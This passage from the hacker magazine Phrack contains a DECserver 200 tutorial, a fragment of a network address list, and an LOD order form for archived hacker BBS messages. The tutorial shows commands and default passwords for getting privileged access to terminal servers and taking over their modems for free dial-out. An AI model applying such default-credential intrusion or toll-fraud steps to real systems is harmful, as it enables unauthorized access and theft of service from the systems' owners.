  15990. 84800728             %XGATE
  15991. 84800784             XENIX System
  15992. 84800829             Alberta Wheat Pool
  15993. 84800888             ALLSTATE (VMS/VAX)
  15994. 91100014             Gandalf System - Canadian Facts
  15995. 91100174             VMS/VAX
  15996. 91100482             Grassroots System              (Special Emul. Needed)
  15997. 92100086             DATAPAC Information
  15998. 93200233             UM-Net
  15999. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  16000.                               ==Phrack Magazine==
  16001.  
  16002.                  Volume Four, Issue Forty-Four, File 22 of 27
  16003.  
  16004. ****************************************************************************
  16005.  
  16006.  
  16007.                -- An Introduction to the DECserver 200 --
  16008.                      by Opticon The Disassembled
  16009.  
  16010.  
  16011.  ANARCHY: "The belief that society
  16012.  can be maintained without prisons,
  16013.  armies, police or other organized force to
  16014.  maintain property rights, collect taxes or
  16015.  enforce such personal obligations as debts,
  16016.  contracts or alimony." -EB 1966, vol.I
  16017.  (taken from the Phrozen Realm)
  16018.  
  16019.  
  16020.  "If ur good, nobody knows that ur there"
  16021.  
  16022.     The DECserver is a terminal server (WOW!).  The Model 200 is the most
  16023. commonly found server in VMS machines.  This device connects up to eight
  16024. asynchronous (RS232C) terminals to one or more hosts available on an Ethernet
  16025. Local Area Network.
  16026.  
  16027.     It is connected to the LAN through an Ethernet physical channel and
  16028. supports speeds up to 19.200bps.  It can be found on VAXes, mVAXes and
  16029. VAXstations.  It uses the Local Area Transport protocol to communicate with
  16030. the other nodes.  It also implements the Terminal Device/Session Management
  16031. Protocol to achieve multiple sessions.  Things that can be found plugged on
  16032. it include dial-in and out modems, terminals, printers and stuff like that.
  16033. The identification code for it in VMS is DS2.  It's software is installed
  16034. via VMSINSTAL.COM to SYS$SYSROOT:[DECSERVER] or in SYS$COMMON:[DECSERVER]
  16035. for the cluster machines.  And of course now you will ask why should you
  16036. be interested in a damn phucking (=relief, back to my native language) SERVER.
  16037. A lot of interesting things can be done, like dialing out for free (assuming
  16038. you can connect to it in a convenient way).  You can even find a DEC server
  16039. 200 dedicated to eight high speed modems.  There is no need to say that you
  16040. need privileges to phuck up with devices like that...or there is?
  16041.  
  16042. ..Set Default to SYS$SYSROOT:[DECSERVER] and run DSVCONFIG.COM :
  16043.  
  16044. $
  16045. $ set default sys$sysroot:[decserver]
  16046. $ show default
  16047.   SYS$SYSROOT:[DECSERVER]
  16048.   =   SYS$SYSROOT:[DECSERVER]
  16049.   =   SYS$COMMON:[DECSERVER]
  16050. $ @dsvconfig
  16051.  
  16052.     You must assign a unique DECnet node name and DECnet node
  16053. address for each new DECserver.
  16054.  
  16055. Press <RET> to start, or <CTRL/Z> to exit...
  16056.  
  16057.       D E C s e r v e r   C o n f i g u r a t i o n   P r o c e d u r e
  16058.  
  16059.                                                       Version: V1.7
  16060.  
  16061.                                Menu of Options
  16062.  
  16063.                        1 - List known DECservers
  16064.                        2 - Add a DECserver
  16065.                        3 - Swap an existing DECserver
  16066.                        4 - Delete an existing DECserver
  16067.                        5 - Restore existing DECservers
  16068.                   CTRL/Z - Exit from this procedure
  16069.  
  16070.         Your selection? 1
  16071.  
  16072. DECnet  DECnet Server Service
  16073. Address Name   Type   Circuit  Ethernet Address   Load File      Dump File
  16074. ------- ------ -----  -------  -----------------  -------------  -------------
  16075.  1.1    KEYWAY DS200  BNA-0    08-00-2B-07-39-5E  PR0801ENG.SYS  DS2KEYWAY.DMP
  16076.  1.2    REVEAL DS200  BNA-0    08-00-2B-28-32-CB  PR0801ENG.SYS  DS2REVEAL.DMP
  16077.  1.3    OASIS  DS200  BNA-0    08-00-2B-26-A9-57  PR0801ENG.SYS  DS2OASIS.DMP
  16078.  1.4    PAWN   DS200  BNA-0    08-00-2B-24-F3-98  PR0801ENG.SYS  DS2PAWN.DMP
  16079.  1.5    OPAQUE DS200  BNA-0    08-00-2B-11-EA-D4  PR0801ENG.SYS  DS2OPAQUE.DMP
  16080.  1.6    TOKEN  DS200  BNA-0    08-00-2B-10-64-98  PR0801ENG.SYS  DS2TOKEN.DMP
  16081.  1.7    KERNEL DS200  BNA-0    08-00-2B-12-D6-39  PR0801ENG.SYS  DS2KERNEL.DMP
  16082.  1.8    IRIS   DS200  BNA-0    08-00-2B-12-D6-39  PR0801ENG.SYS  DS2IRIS.DMP
  16083.  1.9    NEBULA DS200  BNA-0    08-00-2B-12-D6-39  PR0801ENG.SYS  DS2NEBULA.DMP
  16084.  
  16085. Total of 9 DECservers defined.
  16086. (Press RETURN for menu)
  16087.  
  16088. Connecting to one of them:
  16089.  
  16090. $ mc ncp connect node iris
  16091.  
  16092. Console connected (press CTRL/D when finished)
  16093. #
  16094.  
  16095.  
  16096.      Here you must give a password.  The default one is usually working so try
  16097. "access".  Only in "high security" systems they change the default password,
  16098. because privileges are needed anyway to access the Network Control Program
  16099. (which can be a possible subject for my next article).  But since you are in
  16100. using a system account (..privileged) you can change the current password if
  16101. you find any good reason for doing so.  More on that later.
  16102.  
  16103. DECserver 200 Terminal Server V3.0 (BL33) - LAT V5.1
  16104.  
  16105. Please type HELP if you need assistance
  16106.  
  16107. Enter username> <type anything here it doesnt really matter>
  16108.  
  16109.  
  16110.  You are in.
  16111.  
  16112.     In the DECserver there are Permanent and Operational databases.  The
  16113. permanent database holds commands which affect the device permanently when
  16114. you log out.  In the Operational database whatever you do is temporary and
  16115. takes effect only for the time you are logged in.
  16116.  
  16117.     Let's go on by trying to get the default privileged account which enables
  16118. you to view various things and make changes other than the normal ones.
  16119.  
  16120. Local> set privileged
  16121. Password> system
  16122.  
  16123.     Again the default password should work.
  16124.  
  16125. Local> show hosts
  16126.  
  16127. Service Name        Status       Identification
  16128.  
  16129. VMS               1 Connected    Welcome to VAX/VMS V5.4-2
  16130. MODEM               Available    Dial In And Out
  16131. UNIX                Available    BSD
  16132.  
  16133. Local> show nodes
  16134.  
  16135. Node Name           Status       Identification
  16136.  
  16137. VMS               1 Connected    Welcome to VAX/VMS V5.4-2
  16138. UNIX                Reachable    BSD
  16139. IRIS                Reachable
  16140.  
  16141. Local> show services
  16142.  
  16143. Service Name        Status       Identification
  16144.  
  16145. VMS               1 Connected   Welcome to VAX/VMS V5.4-2
  16146. MODEM               Available    Dial In And Out
  16147. UNIX                Available    BSD (RISC)
  16148.  
  16149. Local> show users
  16150.  
  16151. Port    Username             Status          Service
  16152.  
  16153.   1     anything             Connected       VMS
  16154.  
  16155. Local> show sessions (it'll display YOUR sessions)
  16156.  
  16157. Port 1:  anything            Local Mode    Current Session: None
  16158.  
  16159.  
  16160. ** Before proceeding lets have a better look at some Features DECserver 200
  16161. has, needed to understand some interesting things which follow or even some
  16162. things that were previously mentioned.
  16163.  
  16164.     Remote Console Facility (RCF) is a management tool which helps you to
  16165. connect remotely to any server available via it's management port.  This
  16166. is not hardware, but a logical port although it still has the same
  16167. characteristics physical ports have.
  16168.  
  16169.     There are Privileged, non-Privileged and Secured ports.  These are
  16170. variables you can define by the time you manage to get the privileged account.
  16171. A privileged port accepts all server commands.  You can perform tests, define
  16172. server operations, maintain security and all that bullshit.  If you don't
  16173. understand it yet, this status is enabled with the SET PRIVILEGED command we
  16174. have used previously.
  16175.  
  16176.     A non-Privileged port can only manage and use commands which affect the
  16177. sessions that are currently connected to a host or node.  This is the default
  16178. status of course.
  16179.  
  16180.     A Secured port is something in between.  Users can make use of a restricted
  16181. command set to make changes which affect only the port they own ("Property
  16182. is theft but theft is property too, Prounton."  Pardon me if the translation
  16183. was destructive to the original meaning of this phrase, and if I piss you off
  16184. every time I start talking about things that are completely irrelevant
  16185. to the grand scheme of things and everything my articles are SUPPOSED
  16186. to deal with).
  16187.  
  16188.     Our little unit has 5 types of passwords and that will help you understand
  16189. how important it is for the whole system.
  16190.  
  16191.     (1) A PRIVILEGED password is what you should be aware of by now.  You can
  16192. SET/DEFINE SERVER PRIVILEGED PASSWORD "string", to change it.
  16193.  
  16194.     (2) A LOGIN password prevents the use of the server by unauthorized
  16195. users.  This can be enabled for every port or for a single dial-in modem port.
  16196. You must first specify the password for the entire server via SET/DEFINE
  16197. SERVER LOGIN PASSWORD and then, enable or disable it depending on the needs
  16198. of a specified port, via SET/DEFINE PORT x LOGIN PASSWORD ENABLED/DISABLED.
  16199. This password takes effect when you try to login to a port.  The prompt is
  16200. a "#" sign, without the double quotes.
  16201.  
  16202.     (3) A MAINTENANCE password prevents unauthorized users from doing remote
  16203. maintenance operations like the one we did after we ran DSVCONFIG.COM.
  16204. "The DECnet service password corresponds to the server maintenance password
  16205. and it is entirely unrelated with the DECserver 200 service password".  In
  16206. other words someone who wishes to modify a value in your server must give
  16207. in the NCP> command line, a parameter which specifies your server's
  16208. maintenance password.  Of course if this password is set to null (0)
  16209. no password is needed.  Also "Digital Equipment Corporation recommends
  16210. against storing the password in the DECnet database (as the DECnet service
  16211. password) and it strongly suggests that you change the maintenance password
  16212. from the default value of 0 to maintain adequate server security"
  16213. ...tsk tsk tsk...
  16214.  
  16215.     (4) A SERVICE password protects a service or services defined on the
  16216. server.  You can increase or decrease the number of attempts before the server
  16217. gives a message, informing that the connect has failed because of an invalid
  16218. password, via SET/DEFINE SERVER PASSWORD LIMIT.
  16219.  
  16220.     (5) A LOCK password protects your current sessions and port from other
  16221. unwanted human substances.  The server accepts no input until you retype the
  16222. password you used for locking it.
  16223.  
  16224.     Finally, a port may be available only for certain users or groups.
  16225.  
  16226. ** As you can see, it can be really tough to break VMS' security if all the
  16227. available measures are taken.
  16228.  
  16229. Research for modems:
  16230.  
  16231. Local> show port 8
  16232.  
  16233. Port 8:                                Server: IRIS
  16234.  
  16235. Character Size:            8           Input Speed:        19200
  16236. Flow Control:            XON           Output Speed:       19200
  16237. Parity:                 None           Modem Control:   Disabled
  16238.  
  16239. Access:                Local           Local Switch:       None
  16240. Backwards Switch:       None           Name:             PORT_8
  16241. Break:                 Local           Session Limit:         4
  16242. Forwards Switch:        None           Type:               Soft
  16243.  
  16244. Preferred Service: None
  16245.  
  16246. Authorized Groups:   0
  16247. (Current)  Groups:   0
  16248.  
  16249. Enabled Characteristics:
  16250.  
  16251. Autobaud, Autoprompt, Broadcast, Input Flow Control, Loss Notification,
  16252. Message Codes, Output Flow Control, Verification
  16253.  
  16254.     Simple configuration, probably nothing or a terminal in there.  What this
  16255. screen says is that we have on server IRIS, on port 8, something with character
  16256. size of 8, flow control XON (it could be CTS -hardware-), parity none, input
  16257. speed 19200bps, output speed 19200bps and modem control disabled.
  16258.  
  16259.     All the other information have to do with the server and how it reacts to
  16260. certain things.  So if the preferred service was "VMS" and you were logging in
  16261. through port 8, you would immediately connect to the VAX without having the
  16262. server asking you where to log you to.  The "break: Local" variable means that
  16263. if you send a break character you will find yourself in the "Local>" prompt even
  16264. if you have been working in the UNIX OS of the "UNIX" host and that lets you
  16265. start multiple sessions.  Quite useful.  The forward and backward switches are
  16266. for moving around your sessions.  Everything can be modified.
  16267.  
  16268.     For more information concerning the parameters have a look at the command
  16269. reference or the help utility.
  16270.  
  16271. Local> show port 1
  16272.  
  16273. Port 1:                                Server: IRIS
  16274.  
  16275. Character Size:            8           Primary Speed:      9600
  16276. Flow Control:            CTS           Alternate Speed:    2400
  16277. Parity:                 None           Modem Control:   Enabled
  16278.  
  16279. Access:              Dynamic           Local Switch:       None
  16280. Backwards Switch:       None           Name:            MODEM_1
  16281. Break:                 Local           Session Limit:         4
  16282. Forwards Switch:        None           Type:               Soft
  16283.  
  16284. Preferred Service: VMS
  16285.  
  16286. Authorized Groups:   0
  16287. (Current)  Groups:   0
  16288.  
  16289. Enabled Characteristics:
  16290.  
  16291. Autobaud, Autoconnect, Autoprompt, Broadcast, Dialup, DTRwait,
  16292. Inactivity Logout, Input Flow Control, Loss Notification,
  16293. Message Codes, Output Flow Control, Ring, Security, Verification
  16294.  
  16295.  
  16296.     And that's, obviously, a modem.  The speed, the modem control and the enabled
  16297. characteristics will help you understand even if the name is not helping at
  16298. all.  Have a look at the "Alternative Speed" option.
  16299.  
  16300.     What to do now that you have find it?
  16301.  
  16302. Local> set port 1 modem control disabled
  16303. Local> set service modem port 1
  16304. Local> connect modem
  16305.  
  16306.  
  16307.     Start programming.  This way is a little bit awkward and of course there
  16308. is a possibility that the modem is ALREADY defined as a dial-out modem.  You
  16309. are a privileged user, don't forget that.  I would recommend not to harm the
  16310. server ("nothing comes from violence and nothing ever good") and to leave
  16311. things as u find them.  DO NOT create a permanent dial-out modem service
  16312. (which can be done directly from VMS if you really want to) and DO NOT
  16313. forget that somebody has to pay for your calls and that the line which
  16314. the modem uses, may be limited to certain numbers or even prevent out-dialing
  16315. by hardware.  Use your brains...And don't stick in the idea of researching
  16316. modems.  You can use a DECserver to infiltrate a system.  Don't misuse those
  16317. introductions.
  16318.  
  16319.     Overview of Commands (in alphabetical order)
  16320.  
  16321.      *  BACKWARDS
  16322.          Goes back to a previous session.
  16323.      *  BROADCAST
  16324.          Sends a message to a port.
  16325.      *  CLEAR
  16326.          Clears a service.  It belongs to the Operational Database.
  16327.      *  CONNECT
  16328.          Connects to a service or port.
  16329.      *  CRASH
  16330.          Shuts down the server and reinitializes it.
  16331.      *  DEFINE
  16332.          Defines something.  It belongs to the Permanent Database.
  16333.      *  DISCONNECT
  16334.          Disconnects a session or port.
  16335.      *  FORWARD
  16336.          Goes forward to a following session.
  16337.      *  HELP
  16338.          Help.
  16339.      *  INITIALIZE
  16340.          Reboots the server.  You can specify a delay in minutes and
  16341.          "Local>initialize cancel" if you decide, finally, not to
  16342.          do it.
  16343.      *  LIST
  16344.          Displays information on something; Devices,Nodes,Ports,Queue,
  16345.          Server, Services, Sessions...
  16346.      *  LOCK
  16347.          Locks your terminal with a password you specify that moment.
  16348.          Retype your temporary password to continue.
  16349.      *  LOGOUT
  16350.          Logs out the specified port.  If none, your current port.
  16351.      *  MONITOR
  16352.          Devices, Nodes, Ports, Queue, Server, Services, Sessions...
  16353.      *  PURGE
  16354.          Purges a service from the Permanent database.
  16355.      *  RESUME
  16356.          Resumes a session.
  16357.      *  SET
  16358.          Devices, Nodes, Ports, Queue, Server, Services, Sessions,
  16359.          Characteristics,Privileged,NONprivileged...It belongs to the
  16360.          Operational database.
  16361.      *  SHOW
  16362.          Everything.
  16363.      *  TEST
  16364.          Tests a LOOP, PORT or SERVICE.
  16365.  
  16366.     An interesting Warning Message, just for informational purposes, is the
  16367. following;
  16368.  
  16369.       " Local -120- WARNING - Access to service is not secure
  16370.  
  16371.         Session status information cannot be passed between the
  16372.         server and the attached device because modem signals are
  16373.         not present.  This is not a problem if the device is a
  16374.         non-secure printer; however, if the port is a non-LAT
  16375.         host system, users could access other users' data. "
  16376.  
  16377.     That's all for now I think.
  16378.  
  16379.     There are many things to explain but there is no reason for doing that right
  16380. now.  If you need more information then just have a look at the HELP utility or
  16381. contact me, somehow.  [I hope you have not misunderstood my strange looking
  16382. article because my native language is not English]
  16383.  
  16384.  
  16385.     " Opticon: Don't you think that I'm getting insane?
  16386.       TLA: Yeah, sure looks like it..."
  16387.  
  16388.     Love and An-archy to all those who know why.
  16389.  
  16390.  BREAK DOWN THE WALL
  16391.                               ==Phrack Magazine==
  16392.  
  16393.                  Volume Four, Issue Forty-Four, File 23 of 27
  16394.  
  16395. ****************************************************************************
  16396.  
  16397.       The LOD Communications Underground H/P BBS Message Base Project:
  16398.              Information and Order Form File Version #2, 7/30/93
  16399.  
  16400.  
  16401.    This file contains:
  16402.  
  16403.      - Background information on the project;
  16404.      - Excerpts from Computer underground Digest (CuD) Issue #5.39;
  16405.      - UPDATED FAQ AND PRICING; and,
  16406.      - UPDATED Order form and stipulations.
  16407.  
  16408.    This is an update of Version #1 of this file.  A change in pricing
  16409. structure (to your benefit) has been made along with some additions to the
  16410. FAQ among other things. All sections that have been changed/updated are
  16411. bordered by 3 asterisks (*** ___ ***).  Please take the time to read through
  16412. the updates.  Sections without asterisks have not been changed and are
  16413. essentially the same as in Version #1. This file is approximately ten pages
  16414. in length (28K) and should answer all of your questions.
  16415.  
  16416.  
  16417. The Project:
  16418. ------------
  16419.  
  16420.    Throughout history, physical objects have been preserved for posterity for
  16421. the benefit of the next generation of humans.  Cyberspace, however, isn't very
  16422. physical; data contained on floppy diskettes has a finite lifetime as does the
  16423. technology to retrieve that data.  The earliest underground hacker bulletin
  16424. board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s
  16425. were state-of-the-art.  Today, it is difficult to find anyone who has one of
  16426. these machines in operating condition, not to mention the brain cells left to
  16427. recall how to operate them. :-(
  16428.  
  16429.    LOD Communications has created a historical library of the "dark" portion of
  16430. Cyberspace.  The project's goal is to acquire as much information as possible
  16431. from underground Hack/Phreak (H/P) bulletin boards that were in operation
  16432. during a decade long period, dating from the beginnings (in 1980/81 with 8BBS
  16433. and MOM:  Modem Over Manhattan) to the legendary OSUNY, Plover-NET, Legion of
  16434. Doom!, Metal Shop, etc. up through the Phoenix Project circa 1989/90. 
  16435. Currently, messages from over 50 different BBSes have been retrieved, although
  16436. very few message bases are 100% complete.  However, not having a complete "set"
  16437. does not diminish their value.
  16438.  
  16439.  
  16440. Who Benefits From This Information?:
  16441. ------------------------------------
  16442.  
  16443.      - PARTICIPANTS who were on the various H/P BBSes may want to see their
  16444.        contribution to history or reminisce about the "golden era" of hacking;
  16445.  
  16446.      - ENTHUSIASTS who came into the "scene" after most of these boards were
  16447.        down may want to see what they missed;
  16448.  
  16449.      - COMPANIES who may want to see if their (or their competitors') phone
  16450.        systems, computers, or networks were compromised;
  16451.  
  16452.      - SECURITY PROFESSIONALS/LAW ENFORCEMENT who may want to see what
  16453.        techniques were used to subvert computer security systems;
  16454.  
  16455.      - SCHOOLS AND UNIVERSITIES (including their libraries) who may want to
  16456.        use the information for research in sociology or computer science as
  16457.        well as for educational purposes in courses such as Computer Law,
  16458.        Computer Ethics, and Computer Security;
  16459.  
  16460.      - AUTHORS/PRESS who may want to finally get the facts straight about
  16461.        "hackers"; and,
  16462.  
  16463.      - THE CURIOUS PUBLIC who may want to sneak a peek into the inner realm of
  16464.        the Computer Underground, especially those Restricted Access BBSes and
  16465.        their Private sub-boards where only a small handful of "the best"
  16466.        resided.
  16467.  
  16468.    Were the individuals involved in the Computer Underground out to start World
  16469. War III, selling secrets to the Soviets, working with organized crime,
  16470. conspiring to do evil, or just a bunch of bored teenagers with nothing better
  16471. to do?  How much did they know, and how did they find it out?  Did they have
  16472. the capability to shut down phone service of Area Code portions?  Could
  16473. they ruin someone's credit?  Could they "move satellites in the heavens?" 
  16474. Could they monitor packet switching network conversations or YOUR
  16475. conversations?  The answers lie within the messages themselves.
  16476.  
  16477.  
  16478. *** Why is LODCOM Charging Money For The Message Bases?: ***
  16479. ------------------------------------------------------------
  16480.  
  16481.    As happens with most projects, the effort and monetary investment turned
  16482. out to be substantially more than originally anticipated.  With all of the
  16483. high-tech equipment available today, people sometimes forget that in the early
  16484. 1980s, 14.4K baud modems and 250 MB hard drives were just a fantasy for the
  16485. home computer user.  Most messages Lodcom has recovered were downloaded at 300
  16486. baud onto 143K disk drives, with each file usually no larger than 15K in size. 
  16487. One could not call a BBS and download the complete message base in 10 minutes
  16488. and save it into one file.  Literally hundreds of man-hours have been spent
  16489. copying dusty Apple ][ disks, transferring them to IBM (or typing in hard
  16490. copy versions when electronic versions were unavailable), organizing over one
  16491. thousand individual files (thus far) according to what BBS the messages were
  16492. originally posted on, and splicing the files together.  Also, after consulting
  16493. with the appropriate civil liberties organizations and our own legal counsel,
  16494. a slight editing of the messages (restricted to long distance access codes,
  16495. phone numbers, and computer passwords) had to be made to ensure that there is
  16496. nothing illegal contained within the messages.  Every effort was made to keep
  16497. the messages in their pristine condition:  40 columns, ALL CAPS, spelling
  16498. errors, offensive language, inaccuracies of various kinds, and ALL.
  16499.  
  16500.    Although a fairly comprehensive collection of the goings-on during a decade
  16501. of public and private computer underground activity has been accomplished,
  16502. there are more messages out there.  It is our wish to continue to document the
  16503. History of the Computer Underground.  In order to do this, and in order to
  16504. break even on what resources have already been expended (it is a LOT more than
  16505. most people realize), a dollar value has been attached to the entire
  16506. compilation of message bases (ie, all Volumes combined).  Without your
  16507. understanding and support, this effort may not be able to sustain itself long
  16508. enough to complete the project.  A large portion of any profits will be
  16509. recycled for two other projects in the works, whose aim is to provide
  16510. additional historical background on the Computer Underground Community.  That
  16511. is, no one involved is quitting their day job :-)
  16512.  
  16513.   DONATIONS: A portion of every order will be donated to the following causes:
  16514.  
  16515.              1) A donation will be made to help pay for Craig Neidorf's
  16516.                 (Knight Lightning - Metal Shop Private Co-Sysop) Legal Defense
  16517.                 bills (resulting from his successful campaign to protect First
  16518.                 Amendment rights for electronic publishing, i.e. the
  16519.                 PHRACK/E911 case).
  16520.  
  16521.              2) The SotMESC Scholarship Fund.  The SotMESC Scholarship is
  16522.                 awarded to students writing exceptional papers of 20 to 30
  16523.                 pages on a topic based on computer culture (ie, hacking
  16524.                 culture, virus writing culture, Internet culture, etc.) For
  16525.                 more details write: SotMESC  PO BOX 573  Long Beach, MS 39560
  16526.                 or email: rejones@seabass.st.usm.edu
  16527.  
  16528.  
  16529. What Each "Message Base File" Contains:
  16530. ---------------------------------------
  16531.  
  16532.      - A two page general message explaining H/P BBS terminology and format.
  16533.  
  16534.      - The BBS Pro-Phile:  A historical background and description of the BBS
  16535.        either written by the original system operator(s) or those who actually
  16536.        called the BBS when it was in operation (it took months to track the
  16537.        appropriate people down and get them to write these specifically for
  16538.        this project; lesser known BBSes may not contain a Pro-Phile);
  16539.  
  16540.      - Messages posted to the BBS (i.e. the Message Base);
  16541.  
  16542.      - Downloaded Userlists if available; and
  16543.  
  16544.      - Hacking tutorials a.k.a. "G-Philes" that were on-line if available.
  16545.  
  16546.    It is anticipated that most people who are interested in the message bases
  16547. have never heard of a lot of the BBS names shown in the listing.  If you have
  16548. seen one set of messages, you have NOT seen them ALL.  Each system had a
  16549. unique personality, set of users, and each has something different to offer. 
  16550.  
  16551.  
  16552. Formats the Message Base Files are Available in:
  16553. ------------------------------------------------
  16554.  
  16555.    Due to the large size of the Message Base Files, they will be compressed
  16556. using the format of your choice.  Please note that Lodcom does NOT include the
  16557. compression/uncompression program (PKZIP, PAK, etc.).  ASCII (uncompressed)
  16558. files will be provided for $5.00 extra to cover additional diskette (files
  16559. that are uncompressed require more than double the number of diskettes) and
  16560. shipping costs.  The files are available for:
  16561.  
  16562.      - IBM (5.25 or 3.5 inch)
  16563.      - AMIGA (3.5 inch)
  16564.      - APPLE MACINTOSH (3.5 inch)
  16565.      - PAPER versions can be ordered but cost triple (due to increased shipping
  16566.        costs, time to print order, and messages being in 40 column format and
  16567.        therefore wasting lots of paper...save those trees!).  Paper versions
  16568.        take twice the time to deliver but are laser printed.
  16569.  
  16570. Orders are expected to arrive at the requesters' physical mail box in 3-5
  16571. weeks upon receipt of the order.
  16572.  
  16573.  
  16574. *** FAQs (Frequently Asked Questions): ***
  16575. ------------------------------------------
  16576.  
  16577.   QUESTION:  In VERSION #1 of this file a minimum order size of $20.00 was
  16578.              required but I don't see that in this version.  Also all the
  16579.              individual Message Bases had a price.  Why the change?
  16580.  
  16581.    ANSWER: After disseminating the first version of this information file, we
  16582.            received a very good response as far as orders are concerned. Since
  16583.            our goal is to recoup the expenses incurred (and still incurring)
  16584.            on this project rather than 'fleece the masses' it was decided to
  16585.            lower the overall price which translates to offering more files for
  16586.            the same old price.  That is, you will receive ALL Volumes of this
  16587.            project for $39.00 rather than just the 1st Volume as was mentioned
  16588.            in the last release of this information file. As for the minimum
  16589.            order ($20.00), since EVERYONE who has thus far ordered the Message
  16590.            Bases ordered the complete volume (was Volume #1 only, now it's all
  16591.            volumes) rather than individual message bases, we decided to do
  16592.            away with individual Message Base pricing due to lack of demand.
  16593.  
  16594.   QUESTION:  How many Volumes will Lodcom be releasing?
  16595.  
  16596.    ANSWER: Three Volumes minimum, possibly a fourth if additional material
  16597.            is obtained.  There are still a few contributors who have material 
  16598.            that hasn't been sent to us yet.  The expected release of future
  16599.            Volumes are:
  16600.  
  16601.                        Volume 1: 5700+ Messages, 20 H/P BBSes, COMPLETED.
  16602.                        Volume 2: 15-25 H/P BBSes, September 1993.
  16603.                        Volume 3: 15-25 H/P BBSes, November 1993.
  16604.                        Volume 4: If there is one, End of December 1993.
  16605.                        All in all there is expected to be 15000+ Messages.
  16606.  
  16607.   QUESTION:  How long will these Message Base Files be available?
  16608.  
  16609.    ANSWER: We cannot say for sure.  This is an ongoing effort and your support
  16610.            will allow us to continue until we are satisfied with having
  16611.            recovered the last decent scraps of messages out there.  Assuming
  16612.            there is a demand for these messages, all H/P BBSes of WORTH (i.e.
  16613.            NON-"codez" and NON-"warez" systems) are expected to be offered by
  16614.            the end of this year (1993).  A Guesstimate of what will be
  16615.            offered is 60 to 80 Message Bases, half of which will be rather
  16616.            partial.  Orders are expected to be filled at least into the
  16617.            beginning of next year (1994) although this may change. Regardless,
  16618.            we will send out notification well in advance of ceasing operations.
  16619.  
  16620.   QUESTION:  I ordered Volume #1 already, is your new pricing retroactive?
  16621.  
  16622.    ANSWER: Yes.  If you have already ordered Volume #1, when the next Volume
  16623.            is completed it will be sent out to you without any action on your
  16624.            part.  If you change mailing addresses be sure to notify us.  Think
  16625.            of this as a Subscription of sorts.  Order now and all completed
  16626.            Volumes will be sent to you.  When another Volume is finished it
  16627.            will be sent out automatically.  If it wasn't for all of you who
  16628.            have already ordered and showed your support, we would not be able
  16629.            to offer ALL the Volumes for what you paid for the first Volume.
  16630.  
  16631.   QUESTION:  What if lodcom obtains more messages from a BBS or BBSes after 
  16632.              a Volume has been shipped to me, will I get those messages also?
  16633.  
  16634.    ANSWER:  Yes. Any additional messages to a H/P BBS that we obtain after
  16635.             shipping that BBS file to you will be sent to you either via email
  16636.             or via snail mail on another diskette.
  16637.  
  16638.   QUESTION:  I would really like to get a feel for what a few of the
  16639.              boards were like before I order them.  Can I get more info?
  16640.  
  16641.    ANSWER: Yes.  A Sample of actual messages is available by performing the
  16642.            following, so long as you have TELNET access to the Internet:
  16643.  
  16644.            Telnet to:  phantom.com  (or)  198.67.3.2
  16645.            Type:       mindvox         [To enter the Mindvox system]
  16646.            login as:   guest           [To look around]
  16647.            At prompt:  finger lodcom   [To see our Sample Messages File]
  16648.  
  16649.    If you do not have TELNET access to the Internet, AND your host will NOT
  16650. "bounce" a 50K file, Lodcom will send you the Sample Messages File if you
  16651. specifically request it. The file has 31 fairly typical messages from Five
  16652. H/P BBSes that operated between 1983 and 1989.
  16653.  
  16654.   QUESTION:  "Can I help out?  I have some old messages" (either on a C64,
  16655.              Apple, IBM [best for us], or printout).
  16656.  
  16657.    ANSWER: Contact us ASAP!  We will work out an equitable agreement depending
  16658.            on the quantity, quality, format, and "ancientness" of the
  16659.            messages.  Your contribution will not go unrecognized.
  16660.  
  16661.   QUESTION:  I would like another person's point of view on this project
  16662.              before I decide to order.  Where can I get more information?
  16663.  
  16664.    ANSWER: See the following excerpt from Cud #5.39.  We also list where you
  16665.            can get the original CuD issue which also includes an interview and
  16666.            some BBS Pro-philes.
  16667.  
  16668.  
  16669. *** CuD Excerpts: ***
  16670. ---------------------
  16671.  
  16672. Computer underground Digest    Sun May 30 1993   Volume 5 : Issue 39
  16673.                            ISSN  1004-042X
  16674.  
  16675.        Editors: Jim Thomas and Gordon Meyer (TK0JUT2@NIU.BITNET)
  16676.  
  16677. CONTENTS, #5.39 (May 30 1993)
  16678. File 1--The LOD Files - A CuD Critique
  16679. File 2--Histories of BBSes (excerpts from the LOD files)
  16680. File 3--LOD Project Summary and Contact Information
  16681. File 4--An Interview with the LOD
  16682.  
  16683. Cu-Digest is a weekly electronic journal/newsletter.
  16684. Issues of CuD can be found in the Usenet comp.society.cu-digest news group.
  16685. U.S. Anonymous FTP:  ftp.eff.org (192.88.144.4) in /pub/cud directory.
  16686. Back issues may be obtained through mailserver at: server@blackwlf.mese.com
  16687.  
  16688. *** {The following excerpts are from CuD #5.39 File 1, CuD's Critique} ***
  16689.  
  16690. "...Lest there be any confusion, there remains only one LOD, most of its
  16691. original members are in periodic contact, they have long since become
  16692. adults, and there is no relationship between the original LOD and any
  16693. recent individuals or groups claiming the name.
  16694.  
  16695. But who really cares??
  16696.  
  16697. CuD, for one cares. The original LOD remains a cultural icon of the
  16698. 1980s in computer culture, and--for better or worse--it was the most
  16699. influential and imitated group whose mystique continues into the
  16700. mid-90s. This alone is hardly sufficient reason to worry about a
  16701. label. The identity is important because the original members are
  16702. becoming involved in projects that reflects their activities of a
  16703. decade ago, and it becomes confusing when others scurry about trying
  16704. to associate with that identity.  If questions of identity arise,
  16705. confusion over and doubts about the credibility of the projects arise.
  16706.  
  16707. One current LOD project has impressed us. The original LOD members are
  16708. compiling logs from a number of the premier "hacker underground BBSes"
  16709. of the 1980s.  We have obtained excerpts from the project, and we are
  16710. impressed with the professionalism and comprehensiveness of the material.
  16711.  
  16712. Working collectively under the name "LOD Communications," former members have
  16713. scoured their archive for BBS logs from the mid-to-late 1980s. The logs
  16714. include BBSes such as OSUNY, Twilight Zone, Forgotten Realm, Black Ice
  16715. Private, Phoenix Project, Face to Face, Alliance, and Plover-NET, among
  16716. others. Many were the primary boards of the era, and others typify secondary
  16717. levels of the culture. Both singly and in the aggregate, the collection
  16718. provides an unprecedented view into a culture that most of us only read about
  16719. in "Cyberpunk" or "The Hacker Crackdown."
  16720.  
  16721. We like the material for several reasons. First, as researchers, we find even
  16722. the limited material we have seen to date as a rich source of data for anybody
  16723. who wants to understand the culture of time. It is as if somebody had walked
  16724. though San Francisco's Haight-Ashbury district with a video-cam during the
  16725. "Summer of Love" and then released the tapes years later. It's an
  16726. anthropologists dream, a sociologists data trove, and a historian's archival
